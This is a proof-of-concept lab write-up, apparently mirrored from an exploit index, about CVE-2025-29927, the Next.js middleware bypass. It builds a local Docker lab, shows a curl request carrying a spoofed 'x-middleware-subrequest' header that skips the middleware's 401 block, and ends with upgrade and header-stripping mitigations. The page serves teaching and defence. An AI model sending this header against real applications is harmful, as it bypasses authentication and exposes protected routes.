Share
## https://sploitus.com/exploit?id=A22FF02C-FB0D-5B07-B099-687889B4C835
# PoC: CVE-2025-29927 - Next.js Middleware Bypass

This repository contains a Proof of Concept (PoC) demonstrating how to bypass middleware security checks in **Next.js (v13.5.6)** by exploiting a vulnerability related to internal HTTP headers.
---

## Vulnerability Overview: CVE-2025-29927

### What is it?
CVE-2025-29927 is a **Middleware Bypass** vulnerability found in Next.js versions 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3. It allows an external attacker to skip security logic—such as authentication, bot detection, or geolocation redirects—that a developer has implemented in their `middleware.ts` file.

### The Root Cause: Header Trust
Next.js uses internal HTTP headers to communicate between its different architectural layers. One of these headers is `x-middleware-subrequest`. 

The vulnerability exists because vulnerable versions of Next.js trust this header even when it is sent by an **external client** (like a browser or `curl`). [cite_start]When the server sees this header, it assumes the request has already been processed and "cleared" by the middleware, so it skips the execution of your security code entirely.



### Impact
* **Authentication Bypass:** If your app relies on middleware to check for login tokens, an attacker can bypass this check to access protected pages.
* **Security Filter Evasion:** Any logic intended to block malicious IPs or user agents is ignored.
* **Information Disclosure:** Access to internal routes that should be restricted.


## Environment Setup
The lab is running inside a **Node:18-alpine** Docker container to ensure a clean and reproducible environment

---

## Step 1 – Create the Container
We start by spinning up a named container in the background. We use `sleep infinity` to keep the container alive during configuration.

I ran into some issues restarting my container in later stages, that's why I decided on `sleep infinity`

```bash
docker run -d -p 3000:3000 --name CVE-2025-29927-Lab node:18-alpine sleep infinity
```

    


---

## Step 2 – Install Next.js 13.5.6
We install the specific vulnerable version of Next.js. Note that despite the `--src-dir false` flag, the framework creates a `src` directory, which is where we must place our middleware for it to be active.
```bash
docker exec -it CVE-2025-29927-Lab npx --yes create-next-app@13.5.6 lab --typescript --tailwind --eslint --app false --src-dir false --use-npm
```


    



    


---

## Step 3 – Create the "Gatekeeper" (Middleware)
To simulate a security barrier, we create a `middleware.ts` file. This middleware is configured to block all incoming requests with a **401 Unauthorized status**.
```bash
# Enter the container shell
docker exec -it CVE-2025-29927-Lab sh

# Create the middleware file inside the src directory (One long command)
echo "import { NextResponse } from 'next/server'; export function middleware() { return new NextResponse('Blocked', { status: 401 }); } export const config = { matcher: '/:path*' };" > lab/src/middleware.ts
```


    


---

## Step 4 – Start the Server
Start the development server and wait for the **✓ Ready** signal in the console.


    


---

## Step 5 – Verification & Exploitation
Open a **new terminal window** (do not shut previous terminal down) on your host machine to test the environment using `curl`.

### 1. Normal Request (Blocked)
A standard request without modified headers is correctly caught and blocked by our middleware.

```bash
curl.exe -I http://localhost:3000/
# Expected Response: HTTP/1.1 401 Unauthorized
```

### 2. Bypass via CVE-2025-29927 (Exploitation)
By injecting the internal header `x-middleware-subrequest: src/middleware`, we trick Next.js into believing the request has already been verified by an internal process. The server skips the middleware execution and grants full access.

```bash
curl.exe -I -H "x-middleware-subrequest: src/middleware" http://localhost:3000/
# Expected Response: HTTP/1.1 200 OK
```


    


---

## Mitigation

To protect your application against **CVE-2025-29927**, you should upgrade Next.js to the patched version corresponding to your current major release:

### 1. Recommended Updates
The vulnerability is resolved in the following versions. Ensure your `package.json` reflects at least these versions:
* **Next.js 15:** Upgrade to **15.2.3** or later.
* **Next.js 14:** Upgrade to **14.2.25** or later.
* **Next.js 13:** Upgrade to **13.5.9** or later (The version used in this PoC).
* **Next.js 12:** Upgrade to **12.3.5** or later.

```bash
# Example for updating to the latest patched version
npm install next@latest
```

### 2. Infrastructure-Level Defense
If an immediate upgrade is not possible, you should configure your Web Application Firewall (WAF) or Reverse Proxy (e.g., Nginx, Cloudflare, or Varnish) to **strip or drop** the `x-middleware-subrequest` header from all incoming external requests before they reach the Next.js application server.

### 3. Verification
After upgrading, you can verify the fix by re-running the exploit command from Step 5. A patched server will no longer grant a 200 OK when the spoofed header is present.


---

## Conclusion
This vulnerability exists because Next.js trusts client-side headers to identify internal sub-requests. To mitigate this, Next.js should be updated to a version that properly validates or strips these internal headers from external incoming traffic.

### Disclaimer: This PoC is for educational purposes only.

## References
* **NVD Official Entry:** [CVE-2025-29927 Detail](https://nvd.nist.gov/vuln/detail/CVE-2025-29927) - Confirms affected versions 13.5.1 through 13.5.8 and the 13.5.9 fix.
* **GitHub Security Advisory:** [GHSA-65p9-6799-7872](https://github.com/advisories/GHSA-65p9-6799-7872) - The original advisory regarding the middleware bypass.
* **Next.js Security Releases:** [Next.js Blog](https://nextjs.org/blog/security-update-2025-12) - Official announcement of the security patches.